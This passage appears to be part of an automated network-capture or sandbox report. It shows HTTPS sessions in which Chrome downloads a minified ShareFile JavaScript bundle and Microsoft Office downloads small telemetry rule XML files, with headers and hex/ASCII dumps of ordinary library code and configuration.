                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 c3b74c81fdcb7942211a6c721efa13fc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: 9E30zKXjAunOG-Q5a8DwPWQlGFdf43M7PWQaHYGpRnZ19V4dS2KgBw==
                                                                                                                                                                                                                                                                                Age: 37653
                                                                                                                                                                                                                                                                                Vary: Origin


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                91192.168.2.64981713.224.189.1094432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC597OUTGET /sharefile-web/sharefiledev-rubicon-pilet/0.33.3/package/dist/index.js HTTP/1.1
                                                                                                                                                                                                                                                                                Host: piletfeed-cdn.sharefile.io
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                                                                                                Content-Length: 166904
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 05:19:02 GMT
                                                                                                                                                                                                                                                                                Last-Modified: Mon, 23 Sep 2024 13:44:13 GMT
                                                                                                                                                                                                                                                                                ETag: "6ece8cf8647f68f66c594ff97fe16702"
                                                                                                                                                                                                                                                                                x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Server: AmazonS3
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                X-Cache: Hit from cloudfront
                                                                                                                                                                                                                                                                                Via: 1.1 ba5b5e2e7fd98c4a472633bc4c1d4480.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: FRA2-C1
                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: YN4BDcsnVqXmanXUkqOI2ExXFidaz35K4yqcLmh3AaHscm88B2w9VQ==
                                                                                                                                                                                                                                                                                Age: 45977
                                                                                                                                                                                                                                                                                Access-Control-Allow-Origin: https://premierbb.sharefile.com
                                                                                                                                                                                                                                                                                Vary: Origin
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC15773INData Raw: 2f 2f 40 70 69 6c 65 74 20 76 3a 32 28 77 65 62 70 61 63 6b 43 68 75 6e 6b 70 72 5f 73 68 61 72 65 66 69 6c 65 64 65 76 72 75 62 69 63 6f 6e 70 69 6c 65 74 2c 7b 7d 29 0a 53 79 73 74 65 6d 2e 72 65 67 69 73 74 65 72 28 5b 22 40 63 69 74 72 69 74 65 2f 73 66 2d 61 70 69 22 2c 22 40 73 68 61 72 65 66 69 6c 65 64 65 76 2f 61 6e 74 64 2d 63 6f 6e 66 69 67 22 2c 22 61 6e 74 64 22 2c 22 72 65 61 63 74 22 2c 22 72 65 61 63 74 2d 64 6f 6d 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 22 2c 22 72 65 61 63 74 2d 72 6f 75 74 65 72 2d 64 6f 6d 22 2c 22 74 73 6c 69 62 22 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 7b 7d 2c 72 3d 7b 7d 2c 69 3d 7b 7d 2c 6f 3d 7b 7d 2c 73 3d 7b 7d 2c 61 3d 7b 7d 2c 75 3d 7b 7d 2c 63 3d 7b 7d 3b 72 65 74 75 72 6e
                                                                                                                                                                                                                                                                                Data Ascii: //@pilet v:2(webpackChunkpr_sharefiledevrubiconpilet,{})System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},o={},s={},a={},u={},c={};return
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 34 30 34 38 33 34 37 37 2a 28 36 35 35 33 35 26 28 74 5e 3d 74 3e 3e 3e 32 34 29 29 2b 28 35 39 37 39 37 2a 28 74 3e 3e 3e 31 36 29 3c 3c 31 36 29 5e 31 35 34 30 34 38 33 34 37 37 2a 28 36 35 35 33 35 26 6e 29 2b 28 35 39 37 39 37 2a 28 6e 3e 3e 3e 31 36 29 3c 3c 31 36 29 3b 73 77 69 74 63 68 28 69 29 7b 63 61 73 65 20 33 3a 6e 5e 3d 28 32 35 35 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 2b 32 29 29 3c 3c 31 36 3b 63 61 73 65 20 32 3a 6e 5e 3d 28 32 35 35 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 2b 31 29 29 3c 3c 38 3b 63 61 73 65 20 31 3a 6e 3d 31 35 34 30 34 38 33 34 37 37 2a 28 36 35 35 33 35 26 28 6e 5e 3d 32 35 35 26 65 2e 63 68 61 72 43 6f 64 65 41 74 28 72 29 29 29 2b 28 35 39 37 39 37 2a 28 6e 3e 3e 3e 31 36 29 3c 3c 31 36 29 7d 72 65 74 75
                                                                                                                                                                                                                                                                                Data Ascii: 40483477*(65535&(t^=t>>>24))+(59797*(t>>>16)<<16)^1540483477*(65535&n)+(59797*(n>>>16)<<16);switch(i){case 3:n^=(255&e.charCodeAt(r+2))<<16;case 2:n^=(255&e.charCodeAt(r+1))<<8;case 1:n=1540483477*(65535&(n^=255&e.charCodeAt(r)))+(59797*(n>>>16)<<16)}retu
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 77 61 69 74 28 6e 75 6c 6c 3d 3d 28 6c 3d 28 66 3d 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2e 6f 6e 4d 75 74 61 74 65 29 3f 76 6f 69 64 20 30 3a 6c 2e 63 61 6c 6c 28 66 2c 74 68 69 73 2e 73 74 61 74 65 2e 76 61 72 69 61 62 6c 65 73 29 29 3b 65 21 3d 3d 74 68 69 73 2e 73 74 61 74 65 2e 63 6f 6e 74 65 78 74 26 26 74 68 69 73 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 6c 6f 61 64 69 6e 67 22 2c 63 6f 6e 74 65 78 74 3a 65 2c 76 61 72 69 61 62 6c 65 73 3a 74 68 69 73 2e 73 74 61 74 65 2e 76 61 72 69 61 62 6c 65 73 7d 29 7d 63 6f 6e 73 74 20 68 3d 61 77 61 69 74 20 65 28 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 28 6e 3d 28 72 3d 74 68 69 73 2e 6d 75 74 61 74 69 6f 6e 43 61 63 68 65 2e 63 6f 6e 66 69 67 29 2e 6f 6e 53 75 63 63 65 73 73 29 7c 7c 6e 2e
                                                                                                                                                                                                                                                                                Data Ascii: wait(null==(l=(f=this.options).onMutate)?void 0:l.call(f,this.state.variables));e!==this.state.context&&this.dispatch({type:"loading",context:e,variables:this.state.variables})}const h=await e();return null==(n=(r=this.mutationCache.config).onSuccess)||n.
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC15846INData Raw: 20 30 2c 74 68 69 73 2e 75 70 64 61 74 65 52 65 73 75 6c 74 28 29 2c 74 68 69 73 2e 6e 6f 74 69 66 79 28 7b 6c 69 73 74 65 6e 65 72 73 3a 21 30 7d 29 7d 6d 75 74 61 74 65 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 6d 75 74 61 74 65 4f 70 74 69 6f 6e 73 3d 74 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 4d 75 74 61 74 69 6f 6e 26 26 74 68 69 73 2e 63 75 72 72 65 6e 74 4d 75 74 61 74 69 6f 6e 2e 72 65 6d 6f 76 65 4f 62 73 65 72 76 65 72 28 74 68 69 73 29 2c 74 68 69 73 2e 63 75 72 72 65 6e 74 4d 75 74 61 74 69 6f 6e 3d 74 68 69 73 2e 63 6c 69 65 6e 74 2e 67 65 74 4d 75 74 61 74 69 6f 6e 43 61 63 68 65 28 29 2e 62 75 69 6c 64 28 74 68 69 73 2e 63 6c 69 65 6e 74 2c 7b 2e 2e 2e 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2c 76 61 72 69 61 62 6c 65 73 3a 76 6f 69
                                                                                                                                                                                                                                                                                Data Ascii: 0,this.updateResult(),this.notify({listeners:!0})}mutate(e,t){return this.mutateOptions=t,this.currentMutation&&this.currentMutation.removeObserver(this),this.currentMutation=this.client.getMutationCache().build(this.client,{...this.options,variables:voi
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 3f 28 74 3d 74 7c 7c 7b 7d 29 2e 75 72 6c 3d 65 3a 74 3d 65 7c 7c 7b 7d 2c 28 74 3d 61 28 74 68 69 73 2e 64 65 66 61 75 6c 74 73 2c 74 29 29 2e 6d 65 74 68 6f 64 3f 74 2e 6d 65 74 68 6f 64 3d 74 2e 6d 65 74 68 6f 64 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3a 74 68 69 73 2e 64 65 66 61 75 6c 74 73 2e 6d 65 74 68 6f 64 3f 74 2e 6d 65 74 68 6f 64 3d 74 68 69 73 2e 64 65 66 61 75 6c 74 73 2e 6d 65 74 68 6f 64 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3a 74 2e 6d 65 74 68 6f 64 3d 22 67 65 74 22 3b 76 61 72 20 6e 3d 74 2e 74 72 61 6e 73 69 74 69 6f 6e 61 6c 3b 6e 21 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 63 2e 61 73 73 65 72 74 4f 70 74 69 6f 6e 73 28 6e 2c 7b 73
                                                                                                                                                                                                                                                                                Data Ascii: function(e,t){"string"==typeof e?(t=t||{}).url=e:t=e||{},(t=a(this.defaults,t)).method?t.method=t.method.toLowerCase():this.defaults.method?t.method=this.defaults.method.toLowerCase():t.method="get";var n=t.transitional;n!==undefined&&c.assertOptions(n,{s
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 74 72 69 63 74 22 3b 6e 2e 64 28 74 2c 7b 56 3a 28 29 3d 3e 6f 7d 29 3b 76 61 72 20 72 3d 6e 28 32 34 34 35 29 2c 69 3d 6e 28 34 38 37 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 74 3d 65 2e 6c 6f 61 64 69 6e 67 2c 6e 3d 65 2e 73 74 79 6c 65 2c 6f 3d 65 2e 63 68 69 6c 64 72 65 6e 3b 72 65 74 75 72 6e 28 30 2c 72 2e 59 29 28 69 2e 53 70 69 6e 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 73 74 79 6c 65 3a 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 61 6c 69 67 6e 49 74 65 6d 73 3a 22 63 65 6e 74 65 72 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 7d 2c 6e 29 2c 73 70 69 6e 6e 69 6e 67 3a 74 7d 2c 7b 63 68 69 6c 64 72 65 6e 3a 6f 7d 29 2c 76 6f 69 64 20 30 29 7d
                                                                                                                                                                                                                                                                                Data Ascii: trict";n.d(t,{V:()=>o});var r=n(2445),i=n(4876);function o(e){var t=e.loading,n=e.style,o=e.children;return(0,r.Y)(i.Spin,Object.assign({style:Object.assign({display:"flex",alignItems:"center",justifyContent:"center"},n),spinning:t},{children:o}),void 0)}
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 69 6f 6e 3d 75 7c 7c 65 2e 70 6f 73 69 74 69 6f 6e 2c 76 65 28 65 2c 22 64 75 70 6c 69 63 61 74 65 64 20 6d 61 70 70 69 6e 67 20 6b 65 79 22 29 29 2c 22 5f 5f 70 72 6f 74 6f 5f 5f 22 3d 3d 3d 69 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 69 2c 7b 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 76 61 6c 75 65 3a 6f 7d 29 3a 74 5b 69 5d 3d 6f 2c 64 65 6c 65 74 65 20 6e 5b 69 5d 3b 72 65 74 75 72 6e 20 74 7d 66 75 6e 63 74 69 6f 6e 20 43 65 28 65 29 7b 76 61 72 20 74 3b 31 30 3d 3d 3d 28 74 3d 65 2e 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 65 2e 70 6f 73 69 74 69 6f 6e 29 29 3f 65 2e 70 6f 73 69 74 69 6f 6e 2b 2b 3a 31 33 3d 3d 3d 74 3f 28
                                                                                                                                                                                                                                                                                Data Ascii: ion=u||e.position,ve(e,"duplicated mapping key")),"__proto__"===i?Object.defineProperty(t,i,{configurable:!0,enumerable:!0,writable:!0,value:o}):t[i]=o,delete n[i];return t}function Ce(e){var t;10===(t=e.input.charCodeAt(e.position))?e.position++:13===t?(
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 29 29 3e 3d 35 36 33 32 30 26 26 6e 3c 3d 35 37 33 34 33 3f 31 30 32 34 2a 28 72 2d 35 35 32 39 36 29 2b 6e 2d 35 36 33 32 30 2b 36 35 35 33 36 3a 72 7d 66 75 6e 63 74 69 6f 6e 20 78 74 28 65 29 7b 72 65 74 75 72 6e 2f 5e 5c 6e 2a 20 2f 2e 74 65 73 74 28 65 29 7d 76 61 72 20 4f 74 3d 31 2c 43 74 3d 32 2c 45 74 3d 33 2c 41 74 3d 34 2c 6b 74 3d 35 3b 66 75 6e 63 74 69 6f 6e 20 52 74 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 2c 73 2c 61 29 7b 76 61 72 20 75 2c 63 2c 6c 3d 30 2c 66 3d 6e 75 6c 6c 2c 68 3d 21 31 2c 70 3d 21 31 2c 64 3d 2d 31 21 3d 3d 72 2c 79 3d 2d 31 2c 6d 3d 76 74 28 63 3d 53 74 28 65 2c 30 29 29 26 26 63 21 3d 3d 4e 65 26 26 21 67 74 28 63 29 26 26 63 21 3d 3d 56 65 26 26 63 21 3d 3d 65 74 26 26 63 21 3d 3d 4a 65 26 26 63 21 3d 3d 57 65 26 26 63
                                                                                                                                                                                                                                                                                Data Ascii: ))>=56320&&n<=57343?1024*(r-55296)+n-56320+65536:r}function xt(e){return/^\n* /.test(e)}var Ot=1,Ct=2,Et=3,At=4,kt=5;function Rt(e,t,n,r,i,o,s,a){var u,c,l=0,f=null,h=!1,p=!1,d=-1!==r,y=-1,m=vt(c=St(e,0))&&c!==Ne&&!gt(c)&&c!==Ve&&c!==et&&c!==Je&&c!==We&&c
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 7d 7d 2c 7b 6b 65 79 3a 22 72 65 71 75 65 73 74 49 6e 73 74 61 6c 6c 53 6f 6c 75 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 64 53 44 4b 2e 72 65 71 75 65 73 74 49 6e 73 74 61 6c 6c 53 6f 6c 75 74 69 6f 6e 28 65 29 7d 7d 2c 7b 6b 65 79 3a 22 75 70 64 61 74 65 53 6f 6c 75 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 69 74 69 61 6c 69 7a 65 64 53 44 4b 2e 75 70 64 61 74 65 53 6f 6c 75 74 69 6f 6e 28 65 29 7d 7d 2c 7b 6b 65 79 3a 22 75 6e 69 6e 73 74 61 6c 6c 53 6f 6c 75 74 69 6f 6e 22 2c 76 61 6c 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 69 6e 69 74 69 61 6c
                                                                                                                                                                                                                                                                                Data Ascii: }},{key:"requestInstallSolution",value:function(e){return this.initializedSDK.requestInstallSolution(e)}},{key:"updateSolution",value:function(e){return this.initializedSDK.updateSolution(e)}},{key:"uninstallSolution",value:function(e){return this.initial
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC16384INData Raw: 2e 50 72 65 66 65 72 65 6e 63 65 73 2c 74 2e 72 65 71 75 69 72 65 64 41 53 54 73 29 26 26 28 21 28 61 3d 74 2e 72 65 71 75 69 72 65 64 4c 61 75 6e 63 68 44 61 72 6b 6c 79 46 65 61 74 75 72 65 46 6c 61 67 73 29 7c 7c 61 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 65 26 26 28 30 2c 69 2e 59 29 28 74 29 7d 29 2c 21 30 29 29 26 26 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 21 74 29 72 65 74 75 72 6e 21 30 3b 76 61 72 20 6e 3d 28 6e 75 6c 6c 21 3d 65 3f 65 3a 5b 5d 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 7b 7d 2c 65 29 2c 73 28 7b 7d 2c 74 2c 21 30 29 29 7d 29 2c 7b 7d 29
                                                                                                                                                                                                                                                                                Data Ascii: .Preferences,t.requiredASTs)&&(!(a=t.requiredLaunchDarklyFeatureFlags)||a.reduce((function(e,t){return e&&(0,i.Y)(t)}),!0))&&function(e,t){if(!t)return!0;var n=(null!=e?e:[]).reduce((function(e,t){return Object.assign(Object.assign({},e),s({},t,!0))}),{})


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                92192.168.2.64982613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:18 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 428
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                                                                                                                                x-ms-request-id: 1ed1afa2-a01e-000d-2470-1ad1ea000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180518Z-185b7d577bdcmhtqq5qad662uw00000001cg00000000yqg3
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                93192.168.2.64981913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:18 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                                                x-ms-request-id: 2e443ec0-d01e-0066-4b04-1aea17000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180518Z-185b7d577bdt2k4f7f9nr1pp7s00000000y000000000vh0h
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                94192.168.2.64982513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Wed, 09 Oct 2024 18:05:18 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 468
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                                                x-ms-request-id: 006c2e63-c01e-000b-0675-1ae255000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241009T180518Z-185b7d577bdgsgcm5251kab51w00000000vg000000001avz
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                95192.168.2.64982313.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-09 18:05:18 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
